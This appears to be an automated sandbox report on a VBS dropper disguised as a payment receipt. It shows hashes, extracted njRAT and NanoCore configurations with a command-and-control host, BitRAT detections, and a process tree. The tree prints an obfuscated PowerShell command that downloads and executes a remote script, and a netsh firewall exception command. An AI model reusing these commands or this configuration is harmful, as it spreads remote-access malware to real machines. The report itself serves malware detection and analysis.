Analysis
-
max time kernel
158s -
max time network
164s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
08-12-2021 19:08
Static task
static1
Behavioral task
behavioral1
Sample
U2NM18C9NPayment-Receipt.vbs
Resource
win7-en-20211208
General
-
Target
U2NM18C9NPayment-Receipt.vbs
-
Size
483B
-
MD5
f06c964ada559c2eaca171edcbcd86a2
-
SHA1
5222e4b0d39278418a1332331a567b2e8c6ff54e
-
SHA256
ac316c0d4300e61d9e3bdb5a8c2d0069a41973c5495f0606f913e4c311e7df46
-
SHA512
4a38c2b08cce4857281e7fafe0348bf1520de5e8fc1a5e285f702020f0a5caf0984d4dea550b109367201aa73ed28fe1f1fd888385f0f81207a48cd5c6987c08
Malware Config
Extracted
njrat
1.9
HacKed
Microsoft.Exe
-
reg_key
Microsoft.Exe
Extracted
nanocore
1.2.2.0
nov6400.duckdns.org:6400
513706f3-29db-4e99-a51e-059607a7bc45
-
activate_away_mode
true
-
backup_connection_host
nov6400.duckdns.org
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2021-09-17T19:15:29.081949136Z
-
bypass_user_account_control
true
- bypass_user_account_control_data
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
6400
-
default_group
nov 6400
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
513706f3-29db-4e99-a51e-059607a7bc45
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
nov6400.duckdns.org
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
true
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Signatures
-
BitRAT Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/1016-149-0x00000000007E2730-mapping.dmp family_bitrat behavioral2/memory/1016-150-0x0000000000400000-0x00000000007E4000-memory.dmp family_bitrat behavioral2/memory/1016-159-0x0000000000400000-0x00000000007E4000-memory.dmp family_bitrat -
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
-
suricata: ET MALWARE Observed Malicious SSL Cert (BitRAT CnC)
suricata: ET MALWARE Observed Malicious SSL Cert (BitRAT CnC)
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 9 3664 powershell.exe -
Modifies Windows Firewall 1 TTPs
-
Processes:
resource yara_rule behavioral2/memory/1016-148-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/1016-150-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/1016-159-0x0000000000400000-0x00000000007E4000-memory.dmp upx -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
aspnet_regsql.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft.Exe = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_regsql.exe\" .." aspnet_regsql.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft.Exe = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_regsql.exe\" .." aspnet_regsql.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
Processes:
aspnet_regsql.exepid process 1016 aspnet_regsql.exe 1016 aspnet_regsql.exe 1016 aspnet_regsql.exe 1016 aspnet_regsql.exe 1016 aspnet_regsql.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.exedescription pid process target process PID 3664 set thread context of 1016 3664 powershell.exe aspnet_regsql.exe PID 3664 set thread context of 2832 3664 powershell.exe aspnet_regsql.exe PID 3664 set thread context of 856 3664 powershell.exe aspnet_regsql.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exeaspnet_regsql.exepid process 3664 powershell.exe 3664 powershell.exe 3664 powershell.exe 3664 powershell.exe 3664 powershell.exe 856 aspnet_regsql.exe 856 aspnet_regsql.exe 856 aspnet_regsql.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
aspnet_regsql.exepid process 856 aspnet_regsql.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
Processes:
powershell.exeaspnet_regsql.exeaspnet_regsql.exeaspnet_regsql.exedescription pid process Token: SeDebugPrivilege 3664 powershell.exe Token: SeDebugPrivilege 856 aspnet_regsql.exe Token: SeShutdownPrivilege 1016 aspnet_regsql.exe Token: SeDebugPrivilege 2832 aspnet_regsql.exe Token: 33 2832 aspnet_regsql.exe Token: SeIncBasePriorityPrivilege 2832 aspnet_regsql.exe Token: 33 2832 aspnet_regsql.exe Token: SeIncBasePriorityPrivilege 2832 aspnet_regsql.exe Token: 33 2832 aspnet_regsql.exe Token: SeIncBasePriorityPrivilege 2832 aspnet_regsql.exe Token: 33 2832 aspnet_regsql.exe Token: SeIncBasePriorityPrivilege 2832 aspnet_regsql.exe Token: 33 2832 aspnet_regsql.exe Token: SeIncBasePriorityPrivilege 2832 aspnet_regsql.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
aspnet_regsql.exepid process 1016 aspnet_regsql.exe 1016 aspnet_regsql.exe -
Suspicious use of WriteProcessMemory 31 IoCs
Processes:
WScript.exepowershell.exeaspnet_regsql.exedescription pid process target process PID 3556 wrote to memory of 3664 3556 WScript.exe powershell.exe PID 3556 wrote to memory of 3664 3556 WScript.exe powershell.exe PID 3664 wrote to memory of 1016 3664 powershell.exe aspnet_regsql.exe PID 3664 wrote to memory of 1016 3664 powershell.exe aspnet_regsql.exe PID 3664 wrote to memory of 1016 3664 powershell.exe aspnet_regsql.exe PID 3664 wrote to memory of 1016 3664 powershell.exe aspnet_regsql.exe PID 3664 wrote to memory of 1016 3664 powershell.exe aspnet_regsql.exe PID 3664 wrote to memory of 1016 3664 powershell.exe aspnet_regsql.exe PID 3664 wrote to memory of 1016 3664 powershell.exe aspnet_regsql.exe PID 3664 wrote to memory of 2832 3664 powershell.exe aspnet_regsql.exe PID 3664 wrote to memory of 2832 3664 powershell.exe aspnet_regsql.exe PID 3664 wrote to memory of 2832 3664 powershell.exe aspnet_regsql.exe PID 3664 wrote to memory of 2832 3664 powershell.exe aspnet_regsql.exe PID 3664 wrote to memory of 2832 3664 powershell.exe aspnet_regsql.exe PID 3664 wrote to memory of 2832 3664 powershell.exe aspnet_regsql.exe PID 3664 wrote to memory of 2832 3664 powershell.exe aspnet_regsql.exe PID 3664 wrote to memory of 2832 3664 powershell.exe aspnet_regsql.exe PID 3664 wrote to memory of 812 3664 powershell.exe aspnet_regsql.exe PID 3664 wrote to memory of 812 3664 powershell.exe aspnet_regsql.exe PID 3664 wrote to memory of 812 3664 powershell.exe aspnet_regsql.exe PID 3664 wrote to memory of 856 3664 powershell.exe aspnet_regsql.exe PID 3664 wrote to memory of 856 3664 powershell.exe aspnet_regsql.exe PID 3664 wrote to memory of 856 3664 powershell.exe aspnet_regsql.exe PID 3664 wrote to memory of 856 3664 powershell.exe aspnet_regsql.exe PID 3664 wrote to memory of 856 3664 powershell.exe aspnet_regsql.exe PID 3664 wrote to memory of 856 3664 powershell.exe aspnet_regsql.exe PID 3664 wrote to memory of 856 3664 powershell.exe aspnet_regsql.exe PID 3664 wrote to memory of 856 3664 powershell.exe aspnet_regsql.exe PID 2832 wrote to memory of 1708 2832 aspnet_regsql.exe netsh.exe PID 2832 wrote to memory of 1708 2832 aspnet_regsql.exe netsh.exe PID 2832 wrote to memory of 1708 2832 aspnet_regsql.exe netsh.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\U2NM18C9NPayment-Receipt.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:3556 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Chiptech=('{2}{1}{0}{3}{4}' -f'bC','We','Net.','lie','nt'); $Freq=('{3}{0}{1}{2}' -f'load','Str','ing','Down'); $sysinfo=('{2}{0}{1}' -f'e','X','I'); &('I'+'eX')(N`ew-Ob`je`ct $Chiptech).$Freq('https://transfer.sh/get/FbOTjD/bypass.txt')2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3664 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1016 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe"3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe" "aspnet_regsql.exe" ENABLE4⤵PID:1708
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe"3⤵PID:812
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:856